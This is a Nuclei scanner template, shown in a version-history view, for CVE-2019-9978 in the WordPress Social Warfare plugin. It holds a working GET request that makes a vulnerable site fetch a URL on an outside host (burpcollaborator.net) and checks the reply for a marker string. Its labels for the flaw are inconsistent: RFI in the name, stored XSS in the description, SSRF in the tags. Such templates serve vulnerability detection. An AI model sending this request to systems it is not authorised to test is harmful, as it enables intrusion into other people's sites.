nuclei-templates/cves/2019/CVE-2019-9978.yaml

23 lines
789 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-9978
2020-08-12 15:05:52 +00:00
info:
name: WordPress social-warfare RFI
author: madrobot & dwisiswant0
2020-08-17 06:02:37 +00:00
severity: critical
2021-03-30 12:00:27 +00:00
description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
reference: https://github.com/mpgn/CVE-2019-9978
2021-03-18 07:54:36 +00:00
tags: cve,cve2019,wordpress,wp-plugin,ssrf
2020-08-12 15:12:50 +00:00
2020-08-12 15:05:52 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net"
2020-08-12 15:05:52 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Burp Collabolator Server"
2020-08-12 15:12:50 +00:00
part: body